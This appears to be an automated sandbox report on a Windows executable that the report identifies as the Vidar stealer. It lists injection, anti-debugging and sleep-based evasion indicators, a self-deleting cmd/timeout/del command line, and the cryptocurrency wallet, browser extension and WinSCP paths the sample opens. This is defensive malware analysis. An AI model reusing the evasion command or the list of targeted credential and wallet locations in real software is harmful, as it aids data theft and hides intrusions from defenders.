Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@10/6@1/2
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 82668342394913559298137947.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00417648 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32First,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle, 2_2_00417648
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4656:120:WilError_01
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAlloc 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAllocEx 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: kernel32.dll 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAlloc 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAllocEx 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: kernel32.dll 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAlloc 2_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAllocEx 2_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: kernel32.dll 2_2_00E81730
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00428945 push ecx; ret 2_2_00428958
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004236AF push ecx; ret 2_2_004236C2
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041A5D9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_0041A5D9

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\file.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Users\user\Desktop\file.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041A5D9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_0041A5D9
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 3636 Thread sleep count: 49 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Is looking for software installed on the system
Source: C:\Users\user\Desktop\file.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00416CDA __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,GetSystemInfo, 2_2_00416CDA
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040C3ED wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_0040C3ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00412548 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412548
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004135E2 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset, 2_2_004135E2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00409DF4 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 2_2_00409DF4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00411603 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00411603
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040D624 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_0040D624
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00417F60 __EH_prolog3_GS,FindFirstFileW,FindNextFileW, 2_2_00417F60
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004118D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_004118D3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00409284 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_memset, 2_2_00409284
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004132B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 2_2_004132B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040A392 __EH_prolog3_GS,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA, 2_2_0040A392
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH.u%SystemRoot%\system32\mswsock.dll*
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E82BB6
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041A5D9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_0041A5D9
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040E905 _memset,_memset,_memset,GetProcessHeap,RtlAllocateHeap,_memset,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,_memmove,lstrlenA,_memmove,lstrlenA,lstrlenA,_memmove,lstrlenA,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,_memset,lstrcat,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_0040E905
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82D4C SetUnhandledExceptionFilter, 0_2_00E82D4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E82BB6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E8285E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00E8285E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0042A39A SetUnhandledExceptionFilter, 2_2_0042A39A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041F69E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041F69E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00426733 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00426733
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00E8285E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00E8285E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00E82BB6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00E82BB6
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00E82D4C SetUnhandledExceptionFilter, 2_2_00E82D4C

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 2_2_0041754C
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0042C0D6
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 2_2_0042E927
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 2_2_0042C1CB
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_0042B9B9
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 2_2_0042C272
Source: C:\Users\user\Desktop\file.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 2_2_0042AA00
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 2_2_0042EA01
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 2_2_00424A1C
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 2_2_0042C2CD
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 2_2_0042C49E
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_0042BCA7
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 2_2_00425CBB
Source: C:\Users\user\Desktop\file.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 2_2_0042C55E
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 2_2_0042AD5D
Source: C:\Users\user\Desktop\file.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 2_2_0042C5C5
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 2_2_0042C601
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E829D2 cpuid 0_2_00E829D2
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82E39 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00E82E39
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004174A0 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 2_2_004174A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041717C GetUserNameA, 2_2_0041717C

Stealing of Sensitive Information
barindex
Yara detected Vidar stealer
Source: Yara match File source: 1.3.file.exe.526a20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.526a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7fb280.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7fb280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???[ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
